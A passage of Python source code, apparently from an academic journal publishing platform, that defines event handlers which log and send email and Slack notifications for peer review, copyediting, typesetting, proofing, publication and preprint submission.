send_reviewer_accepted_or_decline_acknowledgements(**kwargs):\n \"\"\"\n This function is called via the event handling framework and it notifies that a reviewer has either accepted or\n declined to review. 
It is wired up in core/urls.py.\n :param kwargs: a list of kwargs that includes review_assignment, accepted and request\n :return: None\n \"\"\"\n review_assignment = kwargs['review_assignment']\n article = review_assignment.article\n request = kwargs['request']\n accepted = kwargs['accepted']\n\n description = '{0} {1} to review {2}'.format(\n review_assignment.reviewer.full_name(),\n ('accepted' if accepted else 'declined'),\n article.title,\n )\n\n util_models.LogEntry.add_entry(\n types='Review request {0}'.format(('accepted' if accepted else 'declined')),\n description=description,\n level='Info',\n actor=request.user,\n target=article,\n request=request,\n )\n\n review_url = review_logic.get_review_url(\n request,\n review_assignment,\n )\n\n review_in_review_url = request.journal.site_url(\n path=reverse(\n 'review_in_review',\n kwargs={'article_id': article.pk},\n )\n )\n\n context = {\n 'article': article,\n 'request': request,\n 'review_assignment': review_assignment,\n }\n\n reviewer_context = context\n reviewer_context['review_url'] = review_url\n editor_context = context\n editor_context['review_in_review_url'] = review_in_review_url\n\n # send to slack\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n # send to reviewer\n if accepted:\n context[\"reviewer_decision\"] = _(\"accepted\")\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'review_accept_acknowledgement',\n 'subject_review_accept_acknowledgement',\n review_assignment.reviewer.email,\n reviewer_context,\n )\n\n else:\n context[\"reviewer_decision\"] = _(\"declined\")\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'review_decline_acknowledgement',\n 'subject_review_decline_acknowledgement',\n review_assignment.reviewer.email,\n reviewer_context,\n )\n\n # send to editor\n editors = get_assignment_editors(review_assignment)\n for editor in editors:\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'reviewer_acknowledgement',\n 'subject_reviewer_acknowledgement',\n editor.email,\n editor_context,\n )\n\n\ndef send_submission_acknowledgement(**kwargs):\n \"\"\"\n This function is called via the event handling framework and it\n notifies site operators of a submission. 
It is\n wired up in core/urls.py.\n :param kwargs: a list of kwargs that includes article and request\n :return: None\n \"\"\"\n\n article = kwargs['article']\n request = kwargs['request']\n\n util_models.LogEntry.add_entry(\n types='Submission Complete',\n description='A new article {0} was submitted'.format(article.title),\n level='Info',\n actor=request.user,\n target=article,\n request=request,\n )\n\n log_dict = {\n 'level': 'Info',\n 'action_text': 'A new article {0} was submitted'.format(article.title),\n 'types': 'New Submission Acknowledgement',\n 'target': article,\n }\n\n # generate URL\n review_unassigned_article_url = request.journal.site_url(\n path=reverse(\n 'review_unassigned_article',\n kwargs={'article_id': article.pk},\n )\n )\n notify_helpers.send_slack(\n request,\n 'New submission: {0} {1}'.format(\n article.title,\n review_unassigned_article_url,\n ),\n ['slack_editors'])\n\n # send to author\n context = {\n 'article': article,\n 'request': request,\n 'review_unassigned_article_url': review_unassigned_article_url,\n }\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'submission_acknowledgement',\n 'subject_submission_acknowledgement',\n article.correspondence_author.email,\n context,\n log_dict=log_dict,\n )\n\n # send to all editors\n editors_to_email = setting_handler.get_setting(\n 'general', 'editors_for_notification', request.journal).processed_value\n\n if editors_to_email:\n editor_pks = [int(pk) for pk in editors_to_email]\n editor_emails = {\n role.user.email for role in core_models.AccountRole.objects.filter(\n role__slug='editor',\n user__id__in=editor_pks,\n )\n }\n else:\n editor_emails = set(request.journal.editor_emails)\n\n assigned_to_section = (\n article.section.editors.all() | article.section.section_editors.all())\n\n editor_emails |= {editor.email for editor in assigned_to_section}\n\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'editor_new_submission',\n 'subject_editor_new_submission',\n editor_emails,\n context,\n log_dict=log_dict,\n custom_reply_to=[f\"noreply{settings.DUMMY_EMAIL_DOMAIN}\"]\n )\n\n\ndef send_article_decision(**kwargs):\n article = kwargs['article']\n request = kwargs['request']\n decision = kwargs['decision']\n subject = \"\"\n user_message_content = kwargs['user_message_content']\n\n if 'skip' not in kwargs:\n kwargs['skip'] = True\n\n skip = kwargs['skip']\n\n description = '{0}\\'s article \"{1}\" has been {2}ed by {3}'.format(article.correspondence_author.full_name(),\n article.title,\n decision,\n request.user.full_name())\n\n log_dict = {'level': 'Info',\n 'action_text': description,\n 'types': 'Article Decision',\n 'target': article}\n\n if decision == ED.ACCEPT.value:\n subject = 'subject_review_decision_accept'\n elif decision == ED.DECLINE.value:\n subject = 'subject_review_decision_decline'\n elif decision == ED.UNDECLINE.value:\n subject = 'subject_review_decision_undecline'\n\n\n if not skip:\n notify_helpers.send_email_with_body_from_user(\n request,\n subject,\n article.correspondence_author.email,\n user_message_content,\n log_dict=log_dict\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_revisions_request(**kwargs):\n request = kwargs['request']\n revision = kwargs['revision']\n user_message_content = kwargs['user_message_content']\n\n if 'skip' not in kwargs:\n kwargs['skip'] = True\n\n skip = kwargs['skip']\n\n description = '{0} has requested revisions for {1} due on {2}'.format(\n request.user.full_name(),\n 
revision.article.title,\n revision.date_due,\n )\n\n log_dict = {'level': 'Info',\n 'action_text': description,\n 'types': 'Revision Request',\n 'target': revision.article,\n }\n\n if not skip:\n notify_helpers.send_email_with_body_from_user(\n request,\n 'subject_request_revisions',\n revision.article.correspondence_author.email,\n user_message_content,\n log_dict=log_dict,\n )\n notify_helpers.send_slack(\n request,\n description,\n ['slack_editors'],\n )\n\n\ndef send_revisions_complete(**kwargs):\n request = kwargs['request']\n revision = kwargs['revision']\n\n action_text = ''\n for action in revision.actions.all():\n action_text = \"{0}<br><br>{1} - {2}\".format(action_text, action.logged, action.text)\n\n description = ('<p>{0} has completed revisions for {1}</p> Actions:<br>{2}'\n ''.format(request.user.full_name(), revision.article.title, action_text)\n )\n notify_helpers.send_email_with_body_from_user(\n request,\n 'subject_revisions_complete_receipt',\n {editor.email for editor in get_assignment_editors(revision)},\n description,\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n util_models.LogEntry.add_entry(\n types='Revisions Complete', description=action_text, level='Info',\n request=request, target=revision.article,\n )\n\n\ndef send_revisions_author_receipt(**kwargs):\n request = kwargs['request']\n revision = kwargs['revision']\n\n description = '{0} has completed revisions for {1}'.format(\n request.user.full_name(),\n revision.article.title,\n )\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Revisions Complete',\n 'target': revision.article,\n }\n context = {\n 'revision': revision,\n }\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'revisions_complete_receipt',\n 'subject_revisions_complete_receipt',\n revision.article.correspondence_author.email,\n context,\n log_dict=log_dict,\n )\n notify_helpers.send_slack(\n request,\n description,\n ['slack_editors'],\n )\n\n\ndef send_copyedit_assignment(**kwargs):\n request = kwargs['request']\n copyedit_assignment = kwargs['copyedit_assignment']\n user_message_content = kwargs['user_message_content']\n skip = kwargs.get('skip', False)\n\n description = '{0} has requested copyediting for {1} due on {2}'.format(\n request.user.full_name(),\n copyedit_assignment.article.title,\n copyedit_assignment.due,\n )\n\n if not skip:\n log_dict = {\n 'level': 'Info', 'action_text': description,\n 'types': 'Copyedit Assignment',\n 'target': copyedit_assignment.article,\n }\n response = notify_helpers.send_email_with_body_from_user(\n request, 'subject_copyeditor_assignment_notification',\n copyedit_assignment.copyeditor.email,\n user_message_content, log_dict,\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_copyedit_updated(**kwargs):\n request = kwargs['request']\n copyedit_assignment = kwargs['copyedit_assignment']\n skip = kwargs.get('skip', False)\n\n if not skip:\n # send to slack\n notify_helpers.send_slack(request,\n 'Copyedit assignment {0} updated'.format(copyedit_assignment.pk),\n ['slack_editors'])\n\n log_dict = {'level': 'Info',\n 'action_text': 'Copyedit assignment #{number} update.'.format(number=copyedit_assignment.pk),\n 'types': 'Revision Request',\n 'target': copyedit_assignment.article}\n\n # send to author\n notify_helpers.send_email_with_body_from_setting_template(request,\n 'copyedit_updated',\n 'subject_copyedit_updated',\n copyedit_assignment.copyeditor.email,\n context={'request': request,\n 
'copyedit_assignment': copyedit_assignment},\n log_dict=log_dict)\n\n\ndef send_copyedit_deleted(**kwargs):\n request = kwargs['request']\n copyedit_assignment = kwargs['copyedit_assignment']\n skip = kwargs.get('skip', False)\n\n description = 'Copyedit task {0} for article {1} deleted.'.format(copyedit_assignment.pk,\n copyedit_assignment.article.title)\n\n if not skip:\n # send to slack\n notify_helpers.send_slack(request,\n 'Copyedit assignment {0} updated'.format(copyedit_assignment.pk),\n ['slack_editors'])\n\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Copyedit Assignment Deleted',\n 'target': copyedit_assignment.article}\n # send to copyeditor\n notify_helpers.send_email_with_body_from_setting_template(request,\n 'copyedit_deleted',\n 'subject_copyedit_deleted',\n copyedit_assignment.copyeditor.email,\n context={'request': request,\n 'copyedit_assignment': copyedit_assignment},\n log_dict=log_dict)\n\n\ndef send_copyedit_decision(**kwargs):\n request = kwargs['request']\n decision = kwargs[\"decision\"]\n copyedit_assignment = kwargs['copyedit_assignment']\n\n description = '{0} has {1}ed copyediting task for {2} due on {3}.'.format(\n copyedit_assignment.copyeditor.full_name(),\n decision,\n copyedit_assignment.article.title,\n copyedit_assignment.due)\n\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Copyediting Decision',\n 'target': copyedit_assignment.article}\n\n notify_helpers.send_email_with_body_from_user(request, 'subject_copyediting_decision',\n copyedit_assignment.editor.email,\n description, log_dict=log_dict)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_copyedit_author_review(**kwargs):\n request = kwargs['request']\n copyedit_assignment = kwargs['copyedit_assignment']\n user_message_content = kwargs['user_message_content']\n skip = kwargs.get('skip', False)\n\n description = '{0} has requested copyedit review for {1} from {2}'.format(\n request.user.full_name(),\n copyedit_assignment.article.title,\n copyedit_assignment.article.correspondence_author.full_name())\n\n if not skip:\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Copyedit Author Review',\n 'target': copyedit_assignment.article}\n\n notify_helpers.send_email_with_body_from_user(request, 'subject_copyeditor_notify_author',\n copyedit_assignment.article.correspondence_author.email,\n user_message_content, log_dict=log_dict)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_copyedit_complete(**kwargs):\n request = kwargs['request']\n copyedit_assignment = kwargs['copyedit_assignment']\n article = kwargs['article']\n\n description = 'Copyediting requested by {0} from {1} for article {2} ' \\\n 'has been completed'.format(\n request.user.full_name(),\n copyedit_assignment.copyeditor.full_name(),\n article.title\n )\n\n log_dict = {\n 'level': 'Info', 'action_text': description,\n 'types': 'Copyedit Complete',\n 'target': article,\n }\n article_copyediting_url = request.journal.site_url(reverse(\n 'article_copyediting', args=[article.pk],\n ))\n\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'copyeditor_notify_editor',\n 'subject_copyeditor_notify_editor',\n copyedit_assignment.editor.email,\n context={\n 'assignment': copyedit_assignment,\n 'article_copyediting_url': article_copyediting_url,\n },\n log_dict=log_dict,\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_author_copyedit_deleted(**kwargs):\n request = 
kwargs.get('request')\n author_review = kwargs.get('author_review')\n subject = kwargs.get('subject')\n user_message_content = kwargs.get('user_message_content')\n skip = kwargs.get('skip', False)\n\n description = '{0} has deleted a copyedit review for {1} from {2}'.format(\n request.user.full_name(),\n author_review.assignment.article.title,\n author_review.assignment.article.correspondence_author.full_name(),\n )\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Author Copyedit Review Deleted',\n 'target': author_review.assignment.article,\n }\n\n if not skip:\n notify_helpers.send_email_with_body_from_user(\n request,\n subject,\n author_review.assignment.article.correspondence_author.email,\n user_message_content,\n log_dict=log_dict,\n )\n else:\n util_models.LogEntry.add_entry(\n 'Author Copyedit Review Deleted',\n description,\n 'Info',\n request.user,\n request,\n author_review.assignment.article,\n )\n\n\ndef send_copyedit_ack(**kwargs):\n request = kwargs['request']\n copyedit_assignment = kwargs['copyedit_assignment']\n user_message_content = kwargs['user_message_content']\n skip = kwargs.get('skip', False)\n\n description = '{0} has acknowledged copyediting for {1}'.format(request.user.full_name(),\n copyedit_assignment.article.title, )\n\n if not skip:\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Copyedit Acknowledgement',\n 'target': copyedit_assignment.article}\n\n notify_helpers.send_email_with_body_from_user(request, 'subject_copyeditor_ack',\n copyedit_assignment.copyeditor.email,\n user_message_content, log_dict=log_dict)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_copyedit_reopen(**kwargs):\n request = kwargs['request']\n copyedit_assignment = kwargs['copyedit_assignment']\n user_message_content = kwargs['user_message_content']\n skip = kwargs.get('skip', False)\n\n description = '{0} has reopened copyediting for {1} from {2}'.format(request.user.full_name(),\n copyedit_assignment.article.title,\n copyedit_assignment.copyeditor.full_name())\n\n if not skip:\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Copyedit Complete',\n 'target': copyedit_assignment.article}\n\n notify_helpers.send_email_with_body_from_user(request, 'subject_copyeditor_reopen_task',\n copyedit_assignment.copyeditor.email,\n user_message_content, log_dict=log_dict)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_typeset_assignment(**kwargs):\n request = kwargs['request']\n typeset_task = kwargs['typeset_task']\n user_message_content = kwargs['user_message_content']\n skip = kwargs.get('skip', False)\n\n description = '{0} has been assigned as a typesetter for {1}'.format(typeset_task.typesetter.full_name(),\n typeset_task.assignment.article.title)\n\n if not skip:\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Typesetting Assignment',\n 'target': typeset_task.assignment.article}\n\n notify_helpers.send_email_with_body_from_user(request, 'subject_typesetter_notification',\n typeset_task.typesetter.email,\n user_message_content, log_dict=log_dict)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_typeset_decision(**kwargs):\n request = kwargs['request']\n typeset_task = kwargs['typeset_task']\n decision = kwargs['decision']\n\n description = '{0} has {1}ed the typesetting task for {2}'.format(typeset_task.typesetter.full_name(),\n decision,\n typeset_task.assignment.article.title)\n\n log_dict = 
{'level': 'Info', 'action_text': description, 'types': 'Typesetter Decision',\n 'target': typeset_task.assignment.article}\n\n notify_helpers.send_email_with_body_from_user(request, 'Article Typesetting Decision',\n typeset_task.assignment.production_manager.email,\n description, log_dict=log_dict)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_typeset_task_deleted(**kwargs):\n request = kwargs['request']\n typeset_task = kwargs['typeset']\n\n description = '{0} has deleted a typesetter task assigned to {1} for article {2}'.format(\n request.user.full_name(),\n typeset_task.typesetter.full_name(),\n typeset_task.assignment.article.title,\n )\n\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Typesetter Assignment Deleted',\n 'target': typeset_task.assignment.article}\n\n # send to author\n notify_helpers.send_email_with_body_from_setting_template(request,\n 'typeset_deleted',\n 'subject_typeset_deleted',\n typeset_task.typesetter.email,\n context={'request': request,\n 'typeset_task': typeset_task}, log_dict=log_dict)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_typeset_complete(**kwargs):\n request = kwargs['request']\n typeset_task = kwargs['typeset_task']\n\n description = '{0} has completed typesetting for article {1}. \\n\\nThe following note was supplied:\\n\\n{2}'.format(\n typeset_task.typesetter.full_name(),\n typeset_task.assignment.article.title,\n typeset_task.note_from_typesetter,\n )\n\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Typesetting Assignment Complete',\n 'target': typeset_task.assignment.article,\n }\n\n production_article_url = request.journal.site_url(\n path=reverse(\n 'production_article',\n kwargs={'article_id': typeset_task.assignment.article.pk},\n )\n )\n\n context = {\n 'production_article_url': production_article_url,\n 'typeset_task': typeset_task,\n 'production_assignment': typeset_task.assignment,\n }\n\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'typesetter_complete_notification',\n 'subject_typesetter_complete_notification',\n typeset_task.assignment.production_manager.email,\n context,\n log_dict=log_dict,\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_production_complete(**kwargs):\n request = kwargs['request']\n article = kwargs['article']\n user_content_message = kwargs['user_content_message']\n assignment = kwargs['assignment']\n\n description = 'Production has been completed for article {0}.'.format(article.title)\n\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Production Complete',\n 'target': article,\n }\n\n for task in assignment.typesettask_set.all():\n notify_helpers.send_email_with_body_from_user(\n request,\n 'Article Production Complete',\n task.typesetter.email,\n user_content_message,\n )\n\n context = {\n 'article': article,\n 'assignment': assignment,\n }\n\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'production_complete',\n 'subject_production_complete',\n article.editor_emails(),\n context,\n log_dict=log_dict,\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef fire_proofing_manager_assignment(**kwargs):\n request = kwargs['request']\n proofing_assignment = kwargs['proofing_assignment']\n article = proofing_assignment.article\n\n description = '{0} has been assigned as proofing manager for {1}'.format(\n 
proofing_assignment.proofing_manager.full_name(),\n article.title,\n )\n log_dict = {\n 'level': 'Info', 'action_text': description,\n 'types': 'Proofing Manager Assigned',\n 'target': article,\n }\n\n proofing_url = request.journal.site_url(reverse(\n 'proofing_article', args=[article.pk]\n ))\n\n context = {\n 'request': request,\n 'proofing_assignment': proofing_assignment,\n 'article': article,\n 'proofing_article_url': proofing_url,\n }\n\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'notify_proofing_manager',\n 'subject_notify_proofing_manager',\n proofing_assignment.proofing_manager.email,\n context,\n log_dict=log_dict,\n )\n\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef cancel_proofing_task(**kwargs):\n request = kwargs['request']\n article = kwargs['article']\n proofing_task = kwargs['proofing_task']\n user_content_message = kwargs.get('user_content_message', '')\n\n description = 'Proofing request for article {0} from {1} has been cancelled by {2}'.format(\n article.title,\n proofing_task.proofreader.full_name(),\n request.user.full_name()\n )\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Proofing Task Cancelled',\n 'target': article}\n context = {'request': request, 'proofing_task': proofing_task, 'user_content_message': user_content_message}\n notify_helpers.send_email_with_body_from_setting_template(request,\n 'notify_proofreader_cancelled',\n 'subject_notify_proofreader_cancelled',\n proofing_task.proofreader.email,\n context, log_dict=log_dict)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef edit_proofing_task(**kwargs):\n request = kwargs['request']\n article = kwargs['article']\n proofing_task = kwargs['proofing_task']\n\n description = 'Proofing request for article {0} from {1} has been edited by {2}'.format(\n article.title,\n proofing_task.proofreader.full_name(),\n request.user.full_name()\n )\n context = {'request': request, 'proofing_task': proofing_task}\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Proofing Task Edited',\n 'target': article}\n notify_helpers.send_email_with_body_from_setting_template(request,\n 'notify_proofreader_edited',\n 'subject_notify_proofreader_edited',\n proofing_task.proofreader.email,\n context, log_dict=log_dict)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef notify_proofreader(**kwargs):\n request = kwargs['request']\n article = kwargs['article']\n proofing_task = kwargs['proofing_task']\n user_content_message = kwargs['user_content_message']\n\n description = 'Proofing request for article {0} from {1} has been requested by {2}'.format(\n article.title,\n proofing_task.proofreader.full_name(),\n request.user.full_name()\n )\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Proofreading Requested',\n 'target': article}\n notify_helpers.send_email_with_body_from_user(request, 'subject_notify_proofreader_assignment',\n proofing_task.proofreader.email,\n user_content_message, log_dict=log_dict)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_proofreader_decision(**kwargs):\n request = kwargs['request']\n proofing_task = kwargs['proofing_task']\n decision = kwargs['decision']\n\n description = '{0} has made a decision for proofing task on {1}: {2}'.format(\n proofing_task.proofreader.full_name(),\n proofing_task.round.assignment.article.title,\n decision\n )\n log_dict = {'level': 'Info', 'action_text': description, 
'types': 'Proofreading Update',\n 'target': proofing_task.round.assignment.article}\n notify_helpers.send_email_with_body_from_user(request, 'Article Proofreading Update',\n proofing_task.round.assignment.proofing_manager.email,\n description, log_dict=log_dict)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_proofreader_complete_notification(**kwargs):\n request = kwargs['request']\n proofing_task = kwargs['proofing_task']\n article = kwargs['article']\n\n description = '{0} has completed a proofing task for {1}'.format(\n proofing_task.proofreader.full_name(),\n article.title,\n )\n proofing_url = request.journal.site_url(reverse(\n 'proofing_article', args=[article.pk]\n ))\n context = {\n 'proofing_task': proofing_task,\n 'proofing_article_url': proofing_url,\n\n }\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'notify_proofreader_complete',\n 'subject_notify_proofreader_complete',\n proofing_task.round.assignment.proofing_manager.email,\n context,\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_proofing_typeset_request(**kwargs):\n request = kwargs['request']\n typeset_task = kwargs['typeset_task']\n article = kwargs['article']\n user_content_message = kwargs['user_content_message']\n skip = kwargs['skip']\n\n description = '{0} has requested typesetting updates from {1} for {2}'.format(\n request.user.full_name(),\n typeset_task.typesetter.full_name(),\n article.title,\n )\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Typesetting Updates Requested',\n 'target': article}\n if not skip:\n notify_helpers.send_slack(request, description, ['slack_editors'])\n notify_helpers.send_email_with_body_from_user(\n request, 'subject_notify_typesetter_proofing_changes',\n typeset_task.typesetter.email,\n user_content_message, log_dict=log_dict)\n\n\ndef send_proofing_typeset_decision(**kwargs):\n request = kwargs['request']\n typeset_task = kwargs['typeset_task']\n decision = kwargs['decision']\n\n description = '{0} has made a decision for proofing task on {1}: {2}'.format(\n typeset_task.typesetter.full_name(),\n typeset_task.proofing_task.round.assignment.article.title,\n decision\n )\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Proofing Typesetting',\n 'target': typeset_task.proofing_task.round.assignment.article}\n notify_helpers.send_email_with_body_from_user(request, 'Proofing Typesetting Changes',\n typeset_task.proofing_task.round.assignment.proofing_manager.email,\n description, log_dict=log_dict)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_corrections_complete(**kwargs):\n request = kwargs['request']\n typeset_task = kwargs['typeset_task']\n article = kwargs['article']\n\n description = '{0} has completed corrections task for article {1} (proofing task {2})'.format(\n request.user.full_name(),\n article.title,\n typeset_task.pk,\n )\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Proofing Typesetting Complete',\n 'target': typeset_task.proofing_task.round.assignment.article,\n }\n proofing_article_url = request.journal.site_url(\n path=reverse(\n 'production_article',\n kwargs={'article_id': typeset_task.proofing_task.assignment.article.pk},\n )\n )\n context = {\n 'typeset_task': typeset_task,\n 'proofing_article_url': proofing_article_url,\n 'production_assignment': typeset_task.proofing_task.assignment,\n }\n notify_helpers.send_email_with_body_from_setting_template(\n 
request,\n 'typesetter_corrections_complete',\n 'subject_typesetter_corrections_complete',\n article.proofingassignment.proofing_manager.email,\n context,\n log_dict=log_dict,\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_proofing_ack(**kwargs):\n request = kwargs['request']\n user_message = kwargs['user_message']\n article = kwargs['article']\n model_object = kwargs['model_object']\n model_name = kwargs['model_name']\n skip = kwargs['skip']\n\n description = \"{0} has acknowledged a task , {1}, by {2} for article {3}\".format(request.user,\n model_name,\n model_object.actor().full_name(),\n article.title)\n\n if not skip:\n notify_helpers.send_email_with_body_from_user(request, 'Proofing Acknowledgement',\n model_object.actor().email,\n user_message)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_proofing_complete(**kwargs):\n request = kwargs['request']\n user_message = kwargs['user_message']\n article = kwargs['article']\n skip = kwargs['skip']\n\n description = \"Proofing is now complete for {0}\".format(article.title)\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Proofing Complete',\n 'target': article,\n }\n if not skip:\n notify_helpers.send_email_with_body_from_user(\n request,\n 'subject_notify_editor_proofing_complete',\n article.editor_emails(),\n user_message,\n log_dict=log_dict,\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_author_publication_notification(**kwargs):\n request = kwargs['request']\n article = kwargs['article']\n user_message = kwargs['user_message']\n section_editors = kwargs['section_editors']\n peer_reviewers = kwargs['peer_reviewers']\n\n description = \"Article, {0}, set for publication on {1}, by {2}\".format(article.title,\n article.date_published,\n request.user.full_name())\n\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Article Published',\n 'target': article}\n\n notify_helpers.send_email_with_body_from_user(request,\n 'subject_author_publication',\n article.correspondence_author.email,\n user_message, log_dict=log_dict)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n # Check for SEs and PRs and notify them as well\n if section_editors:\n for editor in article.section_editors():\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'section_editor_pub_notification',\n 'subject_section_editor_pub_notification',\n editor.email,\n {'article': article, 'editor': editor},\n )\n\n if peer_reviewers:\n reviewers = {review_assignment.reviewer for review_assignment in article.completed_reviews_with_decision}\n for reviewer in reviewers:\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'peer_reviewer_pub_notification',\n 'subject_peer_reviewer_pub_notification',\n reviewer.email,\n {'article': article, 'reviewer': reviewer},\n )\n\n\ndef review_sec_override_notification(**kwargs):\n request = kwargs['request']\n override = kwargs['override']\n\n description = \"{0} overrode their access to {1}\".format(override.editor.full_name(), override.article.title)\n log_dict = {'level': 'Warning', 'action_text': description, 'types': 'Security Override',\n 'target': override.article}\n notify_helpers.send_slack(request, description, ['slack_editors'])\n notify_helpers.send_email_with_body_from_user(request, 'Review Security Override',\n request.journal.editor_emails,\n description, log_dict=log_dict)\n\n\ndef 
send_draft_decison(**kwargs):\n request = kwargs['request']\n draft = kwargs['draft']\n article = kwargs['article']\n\n description = \"Section Editor {0} has drafted a decision for Article {1}\".format(\n draft.section_editor.full_name(), article.title)\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Draft Decision',\n 'target': article,\n }\n review_edit_draft_decision_url = request.journal.site_url(\n path=reverse(\n 'review_edit_draft_decision', args=[article.pk, draft.pk]\n )\n )\n context = {\n 'draft': draft,\n 'article': article,\n 'review_edit_draft_decision_url': review_edit_draft_decision_url,\n }\n notify_helpers.send_slack(request, description, ['slack_editors'])\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'draft_editor_message',\n 'subject_draft_editor_message',\n draft.editor.email if draft.editor else request.journal.editor_emails,\n context,\n log_dict=log_dict,\n )\n\n\ndef send_author_copyedit_complete(**kwargs):\n request = kwargs['request']\n copyedit = kwargs['copyedit']\n author_review = kwargs['author_review']\n\n editor_review_url = request.journal.site_url(\n path=reverse(\n 'editor_review',\n kwargs={\n 'article_id': copyedit.article.pk,\n 'copyedit_id': copyedit.pk,\n }\n )\n )\n description = \"Author {0} has completed their copyediting task for article {1}\".format(\n author_review.author.full_name(),\n copyedit.article.title,\n )\n context = {\n 'copyedit': copyedit,\n 'author_review': author_review,\n 'editor_review_url': editor_review_url,\n }\n notify_helpers.send_slack(request, description, ['slack_editors'])\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'author_copyedit_complete',\n 'subject_author_copyedit_complete',\n copyedit.editor.email,\n context,\n )\n\n\ndef preprint_submission(**kwargs):\n \"\"\"\n Called by events.Event.ON_PRePINT_SUBMISSIONS, logs and emails the author\n and preprint editor.\n :param kwargs: Dictionary containing article and request objects\n :return: None\n \"\"\"\n request = kwargs.get('request')\n preprint = kwargs.get('preprint')\n\n description = '{author} has submitted a new {obj} titled {title}.'.format(\n author=request.user.full_name(),\n obj=request.repository.object_name,\n title=preprint.title,\n )\n log_dict = {\n 'level': 'Info',\n 'action_text': description,\n 'types': 'Submission',\n 'target': preprint,\n }\n\n # Send an email to the user\n context = {'preprint': preprint}\n template = request.repository.submission\n email_text = render_template.get_message_content(\n request,\n context,\n template,\n template_is_setting=True,\n )\n notify_helpers.send_email_with_body_from_user(\n request,\n '{} Submission'.format(request.repository.object_name),\n request.user.email,\n email_text,\n log_dict=log_dict,\n )\n\n # Send an email to the preprint editor\n url = request.repository.site_url() + reverse(\n 'repository_manager_article',\n kwargs={'preprint_id': preprint.pk},\n )\n editor_email_text = 'A new {object} has been submitted to {press}: <a href=\"{url}\">{title}</a>.'.format(\n object=request.repository.object_name,\n press=request.repository.name,\n url=url,\n title=preprint.title\n )\n repo = request.repository\n recipients = repo.submission_notification_recipients if repo.submission_notification_recipients.count() > 0 else repo.managers\n for r in recipients.all():\n notify_helpers.send_email_with_body_from_user(\n request,\n '{} Submission'.format(request.repository.object_name),\n r.email,\n editor_email_text,\n 
